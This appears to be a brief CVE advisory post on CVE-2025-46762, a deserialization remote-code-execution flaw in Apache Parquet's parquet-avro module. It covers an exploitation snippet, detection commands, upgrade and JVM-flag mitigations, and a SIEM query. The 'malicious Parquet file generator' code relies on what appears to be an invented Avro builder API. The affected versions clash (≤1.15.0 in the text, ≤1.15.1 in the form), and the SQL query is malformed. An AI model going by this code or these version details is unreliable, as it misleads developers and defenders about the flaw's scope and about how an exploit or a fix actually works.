Listen to this Post
How CVE-2025-46762 Works
The vulnerability exists in Apache Parquet’s `parquet-avro` module (versions ≤1.15.0) due to insecure schema parsing during deserialization. When using the “specific” or “reflect” data models, attackers can embed malicious Java classes in Parquet files. During deserialization, these classes execute within the JVM context, leading to RCE. The `org.apache.parquet.avro.SERIALIZABLE_PACKAGES` system property in 1.15.1 was insufficiently restricted, still permitting code execution from trusted package lists. The “generic” model avoids this by not instantiating arbitrary classes.
DailyCVE Form
Platform: Apache Parquet
Version: ≤1.15.1
Vulnerability: RCE
Severity: Critical
Date: 2025-05-13
What Undercode Say:
Exploitation:
// Malicious Parquet file generator
AvroSchema schema = new AvroSchema.Builder()
.setType("record")
.addField("payload", "com.attacker.ExploitClass")
.build();
ParquetWriter<GenericRecord> writer = AvroParquetWriter
.<GenericRecord>builder(outputFile)
.withSchema(schema)
.build();
Detection:
Check Parquet version mvn dependency:tree | grep "parquet-avro" Log analysis for suspicious deserialization grep -r "org.apache.parquet.avro.SpecificData" /var/log/
Mitigation:
1. Upgrade to 1.15.2:
<dependency> <groupId>org.apache.parquet</groupId> <artifactId>parquet-avro</artifactId> <version>1.15.2</version> </dependency>
2. Runtime protection (1.15.1):
java -Dorg.apache.parquet.avro.SERIALIZABLE_PACKAGES="" -jar app.jar
Analytics:
- Attack Vector: Network (file upload)
- Complexity: Low (requires reflect/specific mode)
- Privileges: User-level execution
- Patch Gap: 1.15.1 partial fix bypassable
Monitoring:
-- SIEM query for Parquet deserialization events SELECT FROM security_logs WHERE process_name LIKE "%parquet%" AND event_type = "JVM_CLASS_LOAD";
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
